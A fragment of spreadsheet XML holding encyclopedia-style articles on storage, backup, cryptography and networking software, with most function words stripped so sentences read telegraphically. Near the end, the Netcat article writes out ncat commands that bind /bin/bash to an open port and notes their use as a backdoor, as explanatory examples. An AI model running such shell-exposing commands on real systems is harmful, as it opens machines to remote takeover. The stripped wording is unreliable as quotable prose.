internet protocol. recoverpoint applies data compression data de-duplication order reduce wide area network traffic. recoverpoint 3.4, remote site. combined order provide concurrent local remote (clr) replication. consistency group (cg) term used grouping several luns together order ensure write-order consistency several volumes. this used example database stores data journal different logical drives. these logical drives must kept in-sync replica data-consistency needs preserved. other examples multi-volume file systems windows' dynamic disks.similar continuous data protection products, unlike backup products, recoverpoint needs obtain copy every write order track data changes. advertises recoverpoint heterogenous support multi-vendor server, network storage arrays.host-based write splitting done using device driver installed server accessing storage volumes. usage host-based splitter allows replication selected non-emc storage. available fabric-based splitters brocade communications systems switches cisco systems santap. this requires investment additional switch blades. this configuration allows splitting operating systems regardless version, agnostic storage array vendor. storage array splitters supported subset storage products. this method allows write splitting operating systems, require special switching hardware. recoverpoint/se slimmed-down version supports type splitter. each site requires installation cluster composed recoverpoint appliances. multiple appliances work together high availability cluster. each appliance connected san, must access server (scsi initiator) storage (scsi target). each appliance must also connected network management. replication takes place either standard internet protocol. splitters would split traffic storage appliances. besides integration products appsync, vipr, replication manager, control center unisphere, clariion, vnx, symmetrix vplex storage arrays, recoverpoint integrates following products: integration vmware vsphere, vmware site recovery manager microsoft hyper-v allows protection specified virtual machine instead volumes available hypervisor. integration microsoft shadow copy, exchange server oracle database server allows recoverpoint temporarily stop writes host order take consistent application-specific snapshots. application programming interfaces command-line interfaces allow customers integrate custom internal software. notes references continuous data protection with recoverpoint eal2+ certification external links recoverpoint</t>
  </si>
  <si>
    <t>Norton System Insight</t>
  </si>
  <si>
    <t>norton system insight part performance monitoring system, found norton 2010–2012 lines. monitors displays information downloaded files, installed applications, scans detected security risks. also shows number performance alerts. addition, represents memory usage days graphical way, easier understanding provides links norton insight, startup manager "optimize" button, defragments system drive. system insight launched click "performance" link. references</t>
  </si>
  <si>
    <t>Recovery Toolbox</t>
  </si>
  <si>
    <t>recovery toolbox collection utilities online services recovering corrupted files, file formats, repairing passwords various programs. free utilities recovery toolbox free free tool repairing data compact discs physically damaged (scratched, exposed liquids, etc.) affected system errors.recovery toolbox file undelete free free tool repairing deleted files windows operating system. supports ntfs file system, support recovery data stored high performance disks (ssd). shareware utilities recovery toolbox flash repairs deleted files various storage media file systems, including memory cards, smart media cards, microdrives, flash drives, digital cameras, floppy disks.recovery toolbox repairs data damaged archives. supports existing formats compression ratios, password-protected archives, archives stored corrupted media.recovery toolbox excel repairs corrupted microsoft excel files. supports tabular data, styles, fonts, sheets, formulas, functions, cell colors, borders, etc.recovery toolbox outlook fixes errors encountered working microsoft outlook repairs data emails, contacts, reminders, meetings, tasks, notes, calendar entries, logs, data corrupted files. services addition working specialized installed tool, recovery toolbox supports data repair services adobe file formats: documents presentations (adobe acrobat/pdf reader), image files (adobe illustrator), project files (adobe photoshop) microsoft office file formats: excel spreadsheets, word documents (including rtf), powerpoint presentations, project files; email formats: (outlook), dbx(outlook express) other image file formats: (autocad) (coreldraw) database formats: accdb (access), (foxpro/clipper/dbase, etc.) about developer recovery toolbox, inc. company developing software repairing damaged files since 2003. date, solutions developed repair corrupted files different types, including extensions created microsoft office software (such outlook excel) data stored various drives (hard disk drives, portable devices, cd/dvd, etc.). references</t>
  </si>
  <si>
    <t>Norton Power Eraser</t>
  </si>
  <si>
    <t>norton power eraser (npe) small portable executable uses norton insight in-the-cloud application ratings scan computer system. program matches application found user's computer list trusted malicious applications. list trusted applications, power eraser leaves system. list applications, marked deletion. unknown list, reported suspicious marked removal. instead, program recommends "remote scan", upload file symantec's servers check virus definitions. effectiveness power eraser aggressive unknown threats whitelisted instead marked removal sent analysis. tool also features rootkit scanning, requires system restart. threat removal also performed restart, next boot, avoid self-protection viruses trojans. references</t>
  </si>
  <si>
    <t>Recovery procedure</t>
  </si>
  <si>
    <t>telecommunication, recovery procedure process attempts bring system back normal operating state. examples: actions necessary restore automated information system's data files computational capability system failure. data communications, process whereby data station attempts resolve conflicting erroneous conditions arising data transfer. also error detection correction fault-tolerant design fault-tolerant system references this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Network Security Services</t>
  </si>
  <si>
    <t>network security services (nss) collection cryptographic computer libraries designed support cross-platform development security-enabled client server applications optional support hardware tls/ssl acceleration server side hardware smart cards client side. provides complete open-source implementation cryptographic libraries supporting transport layer security (tls) secure sockets layer (ssl) s/mime. releases prior version 3.14 tri-licensed mozilla public license 1.1, general public license, lesser general public license. since release 3.14, releases licensed gpl-compatible mozilla public license 2.0. history originated libraries developed netscape invented security protocol. fips validation niscc testing software crypto module validated five times 1997, 1999, 2002, 2007, 2010) conformance fips security levels first open source cryptographic library receive fips validation. libraries passed niscc tls/ssl s/mime test suites (1.6 million test cases invalid input data). applications aol, hat, microsystems/oracle corporation, google companies individual contributors co-developed nss. mozilla provides source code repository, tracking system, infrastructure mailing lists discussion groups. they others named variety products, including following: mozilla client products, including firefox, thunderbird, seamonkey, firefox mobile. communicator instant messenger (aim) open source client applications evolution, pidgin, openoffice.org onward (and descendants). server products hat: directory server, certificate system, module apache server. server products java enterprise system, including java system server, java system directory server, java system portal server, java system messaging server, java system application server, open source version directory server opends. libreswan ike/ipsec requires nss. fork openswan could optionally nss. architecture includes framework developers oems contribute patches, assembly code, optimize performance platforms. mozilla certified platforms. makes netscape portable runtime (nspr), platform-neutral open-source system functions designed facilitate cross-platform development. like nss, nspr used heavily multiple products. software development addition libraries apis, provides security tools required debugging, diagnostics, certificate management, cryptography-module management, development tasks. comes extensive growing documentation, including introductory material, references, pages command-line tools, sample code. programmers utilize source shared (dynamic) libraries. every release backward-compatible previous releases, allowing users upgrade shared libraries without recompiling relinking applications. interoperability open standards supports range security standards, including following: (rfc 2246), (rfc 4346), (rfc 5246), (rfc 8446). transport layer security (tls) protocol ietf supersedes v3.0 remaining backward-compatible implementations. 3.0. secure sockets layer (ssl) protocol allows mutual authentication client server establishment authenticated encrypted connection. dtls (rfc 4347) (rfc 6347). dtls-srtp (rfc 5764). following pkcs standards: pkcs standard governs implementation public-key cryptography based algorithm. pkcs standard governs implementation diffie–hellman agreement. pkcs standard governs password-based cryptography, example encrypt private keys storage. pkcs standard governs application cryptography data, example digital signatures digital envelopes. pkcs standard governs storage encryption private keys. pkcs standard governs selected attribute types, including used pkcs pkcs pkcs #10. pkcs #10. standard governs syntax certificate requests. pkcs #11. standard governs communication cryptographic tokens (such hardware accelerators smart cards) permits application independence specific algorithms implementations. pkcs #12. standard governs format used store transport private keys, certificates, secret material. cryptographic message syntax, used s/mime (rfc 2311 2633). ietf message specification (based popular internet mime standard) provides consistent send receive signed encrypted mime data. x.509 standard governs format certificates used authentication public-key cryptography. ocsp (rfc 2560). online certificate status protocol (ocsp) governs real-time confirmation certificate validity. pkix certificate profile (rfc 3280). first part four-part standard development public-key infrastructure (x.509) working group ietf (known pkix) public-key infrastructure internet. rsa, dsa, ecdsa, diffie–hellman, diffie–hellman, aes, triple des, camellia, idea, seed, des, rc2, rc4, sha-1, sha-256, sha-384, sha-512, md2, md5, hmac: common cryptographic algorithms used public-key symmetric-key cryptography. fips 186-2 pseudorandom number generator. hardware support supports pkcs interface access cryptographic hardware like tls/ssl accelerators, hardware security modules smart cards. since hardware vendors safenet, thales also support interface, nss-enabled applications work high-speed crypto hardware private keys residing various smart cards, vendors provide necessary middleware. version 3.13 support advanced encryption standard instructions (aes-ni). java support network security services java (jss) consists java interface nss. supports security standards encryption technologies supported nss. also provides pure java interface asn.1 types ber/der encoding. also information security comparison implementations references external links official website</t>
  </si>
  <si>
    <t>Network Security Toolkit</t>
  </si>
  <si>
    <t>network security toolkit (nst) linux-based live dvd/usb flash drive provides free open-source computer security networking tools perform routine security networking diagnostic monitoring tasks. distribution used network security analysis, validation monitoring tool servers hosting virtual machines. majority tools published article "top security tools" insecure.org available toolkit. package management capabilities similar fedora maintains repository additional packages. features many tasks performed within available interface called wui. among tools used interface nmap vizualization tool zenmap, ntop, network interface bandwidth monitor, network segment scanner, session manager vnc, minicom-based terminal server, serial port monitoring, management. other features include visualization ntopng, ntop, wireshark, traceroute, netflow kismet data geolocating host addresses, ipv4 address conversation, traceroute data wireless access points displaying google earth mercator world image, browser-based packet capture protocol analysis system capable monitoring four network interfaces using wireshark, well snort-based intrusion detection system "collector" backend stores incidents mysql database. developers, also javascript console built-in object library functions development dynamic pages. host geolocations following example ntop host geolocation images generated nst. network monitors following image depicts interactive dynamic svg/ajax enabled network interface bandwidth monitor integrated wui. also shown ruler measurement tool overlay perform time bandwidth rate analysis. also backtrack kali linux list digital forensic tools computer security list live references smith, jesse (2020-06-07). distribution release: network security toolkit 32-11992. distrowatch. external links official website sourceforge network security geolocation matrix</t>
  </si>
  <si>
    <t>Network UPS Tools</t>
  </si>
  <si>
    <t>network tools (nut) suite software component designed monitor power devices, uninterruptible power supplies, power distribution units, solar controllers servers power supply units. many brands models supported exposed network protocol standardized interface. follows three-tier model dozens device driver daemons communicate power-related hardware devices selected media using vendor-specific protocols, server upsd represents drivers network (defaulting iana registered port 3493/tcp) using standardized protocol, clients (running localhost server, remote systems) manage power devices query power states metrics applications, usually ranging historic graphing graceful shutdowns orchestrated power failover migration. clients maintained codebase include upsc, upsrw upscmd command-line actions, upsmon relatively simple monitoring graceful shutdowns (considering amount minimally required total available power source units current server), upssched complex monitoring scenarios, upscgi simple interface, nut-monitor desktop client, well libraries third-party clients. being cross-platform project, works unix, linux platforms various system architectures, embedded systems venerable solaris, hp-ux servers. there also native windows builds based previous stable release line, last 2.6.5. history pavel korensky's original apcd provided inspiration pursuing smart-ups protocol 1996. this software apcupsd derived from, according debian maintainer latter.russell kroll, original author coordinator, released initial package, named smartupstools, 1998. design already provided daemons, upsd (which serves data) upsmon (which protects systems), drivers examples, number modules client integration, client tools (upsc, upsrw upscmd), interfacing system specific given model.evgeny "jim" klimov, current project leader since 2020, focuses first automated testing quality assurance existing codebase ensure minimal breakage introduced contributions, well clean older technical debts inconsistencies highlighted modern lint coverage tools, issuing long-overdue official release.over two-decade history, open-source project became facto standard solution monitoring provided distributions embedded many solutions, converged hypervisor set-ups, appliances, enjoyed contributions support numerous end-users well representatives power hardware vendors providing protocol specifications, sample hardware, many cases driver code subsequent fixes based community feedback. references external links official website</t>
  </si>
  <si>
    <t>Remote Differential Compression</t>
  </si>
  <si>
    <t>remote differential compression (rdc) client–server synchronization algorithm allows contents files synchronized communicating differences them. introduced microsoft windows server 2003 included later windows client server operating systems, 2019 developed used microsoft product. unlike binary delta compression (bdc), designed operate known versions single file, make assumptions file similarity versioning. differences files computed fly, therefore suitable efficient synchronization files updated independently, network bandwidth small, files large differences small. algorithm used based fingerprinting blocks file locally ends replication partners. since many types file changes cause file contents move without significant change (for example, small insertion deletion beginning file cause rest file become misaligned original content) blocks used comparison based static arbitrary points points defined contents file segment. this means part file changes length, blocks contents moved parts file, block boundaries parts changed remain fixed related contents, thus series fingerprints blocks change, change position. comparing hashes file hashes file replication pair, able identify blocks file changed not, even contents file significantly reshuffled. since comparing large files could imply making large numbers signature comparisons, algorithm recursively applied hash sets detect blocks hashes changed moved around, significantly reducing amount data needs transmitted comparing files. later versions windows support cross-file rdc, finds files similar replicated, uses blocks similar files identical replicating file minimize data transferred wan. cross-file blocks five similar files.rdc similar many ways older (1996) rsync protocol, useful innovations, particular recursive algorithm cross-file rdc.rdc implemented windows operating systems file, msrdc.dll, present %systemroot%\system32 directory enabled. very little software available makes particularly non-server systems. according internet rumor, enabling significantly slows local file transfers, enabled; microsoft technet page disputes great detail, despite frequent anecdotal posts removal worked restore transfer speeds. discontinuation with release microsoft's windows server 2019, support included section features we’re longer developing (which removed future update), comment "this support isn’t currently used microsoft product". also replication references external links distributed file system about remote differential compression optimizing file replication limited-bandwidth networks using remote differential compression</t>
  </si>
  <si>
    <t>Nettle (cryptographic library)</t>
  </si>
  <si>
    <t>nettle cryptographic library designed easily wide range toolkits applications. began collection low-level cryptography functions 2001. since june 2009 (version 2.0) nettle package. features since version nettle provides block cipher subset rijndael) (with assembly optimizations sparc), arcfour (also known rc4) stream cipher (with sparc assembly), arctwo (also known rc2) stream cipher, blowfish, camellia (with x86_64 assembly optimizations), cast-128, 3des block ciphers, chacha stream cipher (with assembly x86_64), gosthash94, md2, md4, (with assembly) digests, pbkdf2 derivation function, poly1305 (with assembly x86_64) umac message authentication codes, ripemd160, salsa20 stream cipher (with assembly x86_64 arm), serpent block cipher (with assembly x86_64), sha-1 (with x86, x86_64 assembly), sha-2 (sha-224, sha-256, sha-384, sha-512) digests, sha-3 subset keccak digest family), twofish block cipher, rsa, ecdsa public-key algorithms, yarrow prng. version introduced support curve25519 eddsa operations. public-key algorithms gmp.nettle used gnutls. licence motivation fits application well work well different context resulting proliferation cryptographic libraries designed particular applications. nettle attempt avoid problem thing (the low-level cryptography) providing simple general interface particular, nettle algorithm selection, memory allocation i/o. thus nettle intended provide core cryptography library upon numerous application context specific interfaces built. code, test cases, benchmarks, documentation, etc. interfaces shared without replicate nettle's cryptographic code.nettle primarily licensed dual licence scheme comprising general public license version later lesser general public license version later. individual files licensed permissive licences public domain. copyright notices library's source files precisely define licence status particular files.the nettle manual public domain" used reproduced freely. also botan bouncy castle cryptlib libgcrypt crypto++ comparison cryptography libraries references</t>
  </si>
  <si>
    <t>Remote Graphics Software</t>
  </si>
  <si>
    <t>zcentral remote boost, formerly known remote graphics software client-server remote desktop software developed inc. initially launched 2003. enables remote access high-performance workstations virtual workstations) many different devices including workstations, pcs, windows tablets, macbooks thin-clients. software targeted remote access graphic intensive applications, video editing complex models. collaboration, screen sharing, multiple users, remote sound, well windows linux also supported. markets "real-time collaboration", "workstation-class mobility" "remote workers"in 2020 updated re-branded part zcentral solution. zcentral remote boost awarded engineering emmy award 2020 enabling productions around world make despite teams unable access usual studios.with processing, including hardware-accelerated graphics latest opengl directx rendering, done workstation compressed bitmap images (the screen) sent client device. distinguished proprietary compression algorithms allows real-time transmission complex images video, traditional remote desktop protocols struggle with. this opens remote desktops thin clients graphics-intensive industries cad, exploration, animation, architecture engineering construction previously required local workstations. performance improvements opened even demanding cases including remoting displays, delivering frames second, remote desktop sessions applications peak bandwidth usage mbit/s. 2014 released brought remote workstation cases tablet devices. remote desktop tool shown resilience latency packet loss compared citrix teradici's pcoip.there components software, sender (for workstation server) receiver (for client device). software supports opengl microsoft directx. software sold stand alone servers, virtual machines workstations. started including desktop brand workstations starting version 5.4.7 2011. downloaded workstations zbook mobile workstations free. other hardware requires license sender. receiver free download windows, linux macos clients. early version video compression codec, derived patented system developed labs used nasa mars rover program. industry cases remote graphics software used many industries including: used performance high visual fidelity support linux-based applications. massive amounts data going visualizations make server/client model ideal. financial traders stability support multiple high resolution displays fast update rate made ideal market since release blade workstation solution 2006. animation, film special effects support remote video editing, linux-based applications, real time collaboration visual fidelity made ideal film animation studios. architecture engineering construction used collaboration enable subject matter experts work various projects around globe. centralizing large data sets remoting pixels allows users spend time working less time loading project day. product design used collaborate design projects enable remote workers. education engineering animation programs benefits professional counterparts added benefit allowing students access expensive applications home 24/7. versions release notes posted www.hp.com/go/rgs also comparison remote desktop software references external links remote graphics software homepage</t>
  </si>
  <si>
    <t>Novell Storage Manager</t>
  </si>
  <si>
    <t>novell storage manager system software package released novell 2004 uses identity, policy directory events automate full lifecycle management file storage individual users organizational groups. tying storage management organization's existing identity infrastructure, pointed out, novell storage manager enables administration users across file servers single pool rather [in] separate independently managed domains." novell storage manager component novell file management suite. works novell storage manager dynamically manages provisions storage based user group events occur directory, including user creations, group assignments, moves, renames, deletions. when change happens directory affects user’s file storage needs user storage policy, storage manager applies appropriate policy makes necessary changes file system level address storage needs.the following components comprise novell storage manager's identity policy-driven state machine architecture: directory services; storage policies; novell storage manager event monitors; novell storage manager policy engine; novell storage manager agents; action objects. this state machine architecture enables engine properly deal transient waits directory synchronization issues. also allows recovery failures involving network communications, target server server running component storage manager—including policy engine itself. failure interruption occurs point operation, storage manager able successfully continue operation interruption occurred. reviews toigo called novell storage manager robust smart approach corralling user files... organized efficient management scheme". also said "best class" products he'd reviewed. references external links novell storage manager: product homepage overview, features, technical information novell storage manager: support</t>
  </si>
  <si>
    <t>NetTop</t>
  </si>
  <si>
    <t>nettop project multiple single-level systems security-enhanced linux host running vmware windows guest operating system. nettop u.s. patent 6,922,774. external links page nettop vmware page nettop nettop page trusted workstation based nettop</t>
  </si>
  <si>
    <t>Remote access trojan</t>
  </si>
  <si>
    <t>computing, term remote desktop refers software- operating system feature allows personal computer's desktop environment remotely system (usually concept applies equally server smartphone), displayed separate client device. remote desktop applications varying features. some allow attaching existing user's session "remote controlling", either displaying remote control session blanking screen. taking desktop remotely form remote administration. overview remote access also explained remote control computer using another device connected internet another network. this widely used many computer manufacturers large businesses help desks technical troubleshooting customer's problems. remote desktop software captures mouse keyboard inputs local computer (client) sends remote computer (server). remote computer turn sends display commands local computer. when applications many graphics including video models need controlled remotely, remote workstation software sends pixels rather display commands must used provide smooth, like-local experience. remote desktop sharing accomplished common client/server model. client, viewer, installed local computer connects network server component, installed remote computer. typical session, keystrokes mouse clicks registered client actually performing tasks end-user machine.remote desktops also major advantage security development, companies able permit software engineers dispersed geographically operate develop computer held within companies office cloud environment. target computer remote desktop scenario still able access core functions. many core functions, including main clipboard, shared target computer remote desktop client. uses main remote desktop software remote administration remote implementation. this need arises software buyers away software vendor. most remote access software used "headless computers": instead computer monitor, keyboard, mouse, using switch, computer monitor, keyboard, mouse, remote control software, control many headless computers. duplicate desktop mode useful user support education. remote control software combined telephone communication nearly helpful novice computer-users support staff actually there. remote desktop software used access remote computer: physical personal computer user physical access, accessed interacted with. unlike servers, remote computers mainly used peer peer connections, device unattended. remote computer connection generally possible devices network connection. since advent cloud computing remote desktop software housed hardware devices, allowing users connect device connected network internet recreate desktop connection cloud. this model avoids problem remote desktop software, requires local computer switched time user wishes access remotely. possible router support, wake equipment, establish virtual private network (vpn) connection router internet connected lan, switch computer connected router, connect it.) remote desktop products available three models: hosted service, software, appliance. tech support scammers remote desktop software connect victim's computer often syskey computer victim cooperate. protocols remote desktop protocols include following: apple remote desktop protocol (ard) original protocol apple remote desktop macos machines. appliance link protocol (alp) microsystems-specific protocol featuring audio (play record), remote printing, remote usb, accelerated video remote graphics software (rgs) proprietary protocol designed hewlett-packard specifically high workstation remoting collaboration. independent computing architecture (ica) proprietary protocol designed citrix systems technology (nx) proprietary protocol designed nomachine open-source derivatives available forked projects. pc-over-ip (pcoip) proprietary protocol used vmware (licensed teradici) remote desktop protocol (rdp) windows-specific protocol featuring audio remote printing remote frame buffer protocol (rfb) framebuffer level cross-platform protocol based spice (simple protocol independent computing environments) remote-display system built virtual environments qumranet, splashtop high performance remote desktop protocol developed splashtop, fully optimized hardware (h.264) including intel chipsets, nvidia apu, qualcomm snapdragon, nvidia tegra. optimizing different profiles media codecs, splashtop deliver high frame rates latency, also power consumption. xpra protocol originally developed forwarding application seamlessly audio, video, remote printing, etc. extended support windows macos servers window system (x11) well-established cross-platform protocol mainly used displaying local applications; network-transparent wake-on-lan standard protocol remotely waking computers low-power mode (turned off, still access power source). malicious variants remote access trojan (rat, sometimes called creepware) type malware controls system remote network connection. while desktop sharing remote administration many legal uses, "rat" connotes criminal malicious activity. typically installed without victim's knowledge, often payload trojan horse, hide operation victim computer security software anti-virus software. notable examples poisonivy seven beast trojan bifrost blackshades darkcomet back orifice back orifice 2000 also comparison java remote desktop projects comparison remote desktop software freerdp technical support scam chrome remote desktop desktop virtualization extranet remote administration remote desktop protocol virtual desktop extender virtual machine references</t>
  </si>
  <si>
    <t>Reboot Restore Rx</t>
  </si>
  <si>
    <t>reboot restore horizon data sys, freeware application microsoft windows acts alternative windows steadystate allows users restore computer back established baseline. this helps prevent long term damage computer operating system (os). operation upon installation administrator, reboot restore establish baseline. baseline point computer return upon reboot. only administrator allowed update baseline; done tray icon program. program operates outside windows master boot record (mbr) protects mbr, also allows user boot windows even windows otherwise unbootable, whether software change blue screen death. alternatives alternative windows steadystate, reboot restore works maintain computer constant state. there alternatives including faronic's deep freeze, toolwiz time machine, reboot restore (formerly drive vaccine), rollback with latter developed developer reboot restore horizon data sys. accolades reboot restore received generally favourable reviews received many awards. review, techrepublic said, looking make publically-accessible [sic] junk proof consistently reliable, reboot restore definitely nice product consider preserving peace. freeware release might nearly customizable microsoft steadystate time, least system thank allowing condition deteriorate rapidly abuse."in review product, lifehacker wrote, "there's nothing worse rebooting computer thinking everything fine find something's busted need troubleshoot it's especially start problems driver update series windows updates, stuck trying figure thing caused problem first place. reboot restore takes hassle even restore windows boot all."reboot restore award best product 31st annual tech learning awards references</t>
  </si>
  <si>
    <t>NetVault Backup</t>
  </si>
  <si>
    <t>netvault data protection software developed supported quest software. netvault backup backup recovery software product. used protect data software applications physical virtual environments central management interface. supports many servers, application platforms, protocols unix, linux, microsoft windows, vmware, microsoft hyper-v, oracle, sybase, microsoft server, ndmp, oracle acsls, das/aci, microsoft exchange server, db2, teradata. quest software offers data deduplication, protection filers (ndmp). offerings/features/usage netvault backup based client-server architecture. central netvault backup server provides management, media management, device management, client management, reporting, notifications, logging functions. netvault backup server maintains history backups netvault backup database enabling users identify object(s) want restore. netvault clients “agents” work netvault backup server back recover respective servers, applications, data. client software installed machine protected. netvault webui enables centralized administration netvault backup server browser. netvault supports tape drives, tape libraries, backup devices attached central server itself, protected machine located anywhere network enabling lan-free backups. additionally, devices controlled ndmp attached supported filer. netvault backup server (the master backup server) deployed microsoft windows linux. platform application support netvault backup protect windows server, linux, solaris, freebsd, aix, hp-ux, hyper-v, vmware. also back variety applications devices (ndmp) using so-called plug-ins. list includes microsoft server, oracle, microsoft exchange server, lotus notes, db2, sybase, others. components there three options within netvault suite, enabling backup recovery disk tape, bare metal recovery (bmr), data deduplication: netvault backup cross-platform backup recovery software product. used back recover data applications physical virtual environments central management interface. eweek wrote netvault's broad platform support “primary strength.” example, netvault ported “this makes good choice managers want back data apple servers.” netvault smartdisk data deduplication offers disk-based backup, data compression, data deduplication reduce backend storage footprint. uses byte-level, variable block-based software deduplication hardware-agnostic, specialized drives appliances needed. netvault bare metal recovery enables users restore computer "bare metal" state—including necessary operating system, network settings, system settings, applications, disk partitions, data. netapp options quest supports netapp products following technologies: snapmirror tape working conjunction netapp’s snapmirror technology, netvault snapmirror tape enables full volumes filers mirrored backed tape provide ability store data offsite disaster recovery. snapvault manager snapvault manager provides graphical interface integrated netvault backup provide single point enterprise-wide control netapp’s snapvault. this allows organizations back changed data multiple storage platforms common snapshot target netapp appliances. snapshot manager netvault ndmp snapshot manager allows organizations generate, automatically schedule recover snapshots netvault’s gui. disk targets originally netvault backup intended back physical tapes tape drives. however, product soon extended support backup disk. data deduplication, netvault backup supports quest's appliance netvault smartdisk. dell appliance hardware-based, inline deduplication storage product. deduplication engine originally developed ocarina networks. netvault ocarina engineering teams worked integrate technologies.netvault backup also used netvault smartdisk, disk storage repository deduplication product. netvault smartdisk perform post-process data deduplication. represents contiguous storage pool disk without subdivided virtual tapes slots easier management allows byte-level, variable block-based software deduplication. netvault backup supports data domain boost quantum dxi. lan-free backups, netvault backup write physical tape drive shared multiple machines using fibre channel iscsi. history 1989: netvault product originally product developed at&amp;t internal use. 1992: at&amp;t contracted company willow provide tape library support. time, netvault backup version 2.0. willow added tape library management, graphical user interface heterogeneous platform support. 1996: at&amp;t spun netvault product separate private company, commvault, management buyout. time, commvault’s galaxy product primarily optical archiving product used netvault's tape library support within commvault willow could agree term buyout netvault. they eventually agreed deal whereby commvault would longer committed development contract willow ltd. commvault would right license netvault media/device manager willow would full ownership netvault source code. 1997: re-architecture product netvault started fabrice helliker team. unique features, including common graphical user interface windows, unix linux; support shared tape libraries sans; built-in support; plug-in architecture extending protection applications devices. 1998: netvault k.k. japan created bakbone co-founders tony cerqueira barcus. willow ltd. renamed netvault ltd. 1999: development netvault core product complete released year. 2000: bakbone software bought netvault ltd. reverse merger bakbone co-founders tony cerqueira barcus. 2000: bakbone software introduced netvault 6.03, supported network data management protocol (ndmp) netapp filers. 2003: bakbone software released netvault added user-level access reporting infrastructure. 2006: core team designed netvault left bakbone form cofio software. 2009: bakbone software acquired continuous data protection (cdp) technology asempra technologies. rebranded netvault fastrecover. 2011: quest software completed acquisition bakbone software made netvault product line core component data protection strategy. 2012: dell completed acquisition quest software, added dell software group. netvault product line part dell software's "systems management" strategic area. 2014: dell releases netvault backup 10.0, web-based user interface back-end database. 2016: dell sells dell software group francisco partners elliott management corporation, branded 'quest', reusing brand dell acquired software assets. also list backup software references external links netvault backup product page netvault backup release notes, compatibility guides, users guides netvault bare metal recovery</t>
  </si>
  <si>
    <t>Netcat</t>
  </si>
  <si>
    <t>netcat (often abbreviated computer networking utility reading writing network connections using udp. command designed dependable back-end used directly easily driven programs scripts. time, feature-rich network debugging investigation tool, since produce almost kind connection user could need number built-in capabilities. list features includes port scanning, transferring files, port listening: server, used backdoor. features original netcat's features include: outbound inbound connections, udp, ports full forward/reverse checking, appropriate warnings ability local source port ability locally configured network source address built-in port-scanning capabilities, randomization built-in loose source-routing capability read command line arguments standard input slow-send mode, line every seconds dump transmitted received data optional ability another program service establish connections optional telnet-options responderrewrites like gnu's openbsd's support additional features. example, openbsd's supports tls, netcat natively supports tunneling mode supporting (optionally allowing tunneled other) single command, versions require piping data netcat instance another. examples opening connection port mail.server.net performing http request full response (including http headers) dumped standard output. setting one-shot webserver port 8080 present content file file accessed browser http://servername:8080/. netcat serves file first client connects exits; also provides content length browsers expect (this work fine lan, potentially fail kind firewall between.) versions netcat like netcat-traditional debian 8.6, need specify port number. checking whether ports (-u) 80–90 open 192.168.0.1 using zero mode (-z) -vzu 192.168.0.1 80-90 note tests always show "open". test whether port open: simple server client this test useful, shell access server tested, know whether firewall blocking specific port server. listening host, i.e. server whose port needs checked, following: 4172 sending host, following note servname hostname listening host: servname 4172 text typed sending host (type something enter) displayed also listening host, port 4172 open. open, error "connection refused". there caveat. machines, ipv6 default version netcat. thus, host specified hostname contacted using ipv6, user might know this. ports appear closed test, even though would open using ipv4. this difficult notice cause false impression port blocked, actually open. force ipv4 adding options commands. pipe (-u) wait time (-w) second "loggerhost" port echo '&lt;0&gt;message' loggerhost port scanning uncommon netcat port scanning. netcat considered best tool job, sufficient advanced tool nmap) 192.168.1.2 1-1000 parameter prevents lookup, makes receive data server, makes connection timeout second inactivity. proxying another useful behaviour using netcat proxy. both ports hosts redirected. look example: 12345 www.google.com port 12345 represents request. this starts server port 12345 connections redirected google.com:80. browser makes request request sent google response sent browser. that pipes unidirectional. this worked around named pipe redirect input output. option also used ncat implementation: using named pipe reliable method using option provides one-shot proxy. another useful feature proxy connections. this way, traffic viewed wire sniffing applications wireshark. this accomplished unixes utilizing mkfifo, netcat, openssl. making process server netcat used make process network server. listen port pipe input receives process. option spawns executable input output redirected network socket. example, possible expose bourne shell process remote computers. computer address 192.168.1.2, command: then, computer network, could command: way, option used create rudimentary backdoor. some administrators perceive risk thus allow netcat computer. version netcat developed openbsd often installed default distributions debian ubuntu lacks option potential security risk. ncat ncat similar tool netcat provided nmap suite. "while ncat built code “traditional” netcat implementation), ncat definitely based netcat spirit functionality."ncat features includes: ability chain ncats together, redirect ports sites, support, proxy connections socks4 http (connect method) proxies (with optional proxy authentication well). connect example.org port 8080. ncat example.org 8080 listen connections port 8080. ncat 8080 redirect port 8080 local machine host port ncat --sh-exec "ncat example.org 8080 --keep-open bind port 8081 attach /bin/bash world access freely. ncat --exec "/bin/bash" 8081 --keep-open bind shell port 8081, limit access hosts local network, limit maximum number simultaneous connections ncat --exec "/bin/bash" --max-conns --allow 192.168.0.0/24 8081 --keep-open connect smtphost:25 socks4 server port 1080: ncat --proxy socks4host --proxy-type socks4 --proxy-auth user smtphost create http proxy server localhost port 8888. ncat --proxy-type http localhost 8888 send file port 9899 host2 (client) host1 (server). transfer direction, turning ncat “one file” server. encrypted file transfer suppose tunnel, want copy file remote machine. could directly, opens another connection. goal re-use existing connection. ncat this: when 31000:127.0.0.1:31000 (this port forwarding, sending everything port 31000 remote machine port local machine) remote: ncat -lvnp 31000 127.0.0.1 file local: ncat 127.0.0.1 31000 fileno extra overhead. takes care error correction. already encrypted pipe. ports reimplementations original version netcat unix program. last version (1.10) released march 1996.there several implementations posix systems, including rewrites scratch like netcat openbsd netcat, latter supports ipv6 tls. openbsd version ported freebsd base, windows/cygwin, linux.mac comes netcat installed 10.13 users macports install variant.a version netcat called ntool included freedos package group networking. based wattcp stack licensed european union public licence version 1.1.known ports embedded systems includes versions windows (named "netcat wince") iphone.busybox includes default lightweight version netcat. solaris includes netcat implementation based openbsd netcat. socat complex variant netcat. larger flexible options must configured given task. february 2016, santiago zanella-beguelin microsoft vulnerability research issued security advisory regarding composite diffie-hellman parameter hard-coded openssl implementation socat. implausibility composite might unintentionally introduced prime number required suspicion sabotage introduce backdoor software vulnerability. this socat affected version 1.7.3.0 2.0.0-b8 corrected following releases 1.7.3.1 2.0.0-b9.cryptcat version netcat integrated transport encryption capabilities. middle 2005, nmap announced another netcat incarnation called ncat. features possibilities "connection brokering", tcp/udp redirection, socks4 client server support, ability "chain" ncat processes, http connect proxying (and proxy chaining), connect/listen support address/connection filtering. like nmap, ncat cross-platform. systems, modified versions similar netcat utilities command name(s) ncat, pnetcat, socat, sock, socket, sbd. also list unix commands nmap openssl telnet plink packet sender banner grabbing references external links official website nc(1) linux user commands manual</t>
  </si>
  <si>
    <t>Ntopng</t>
  </si>
  <si>
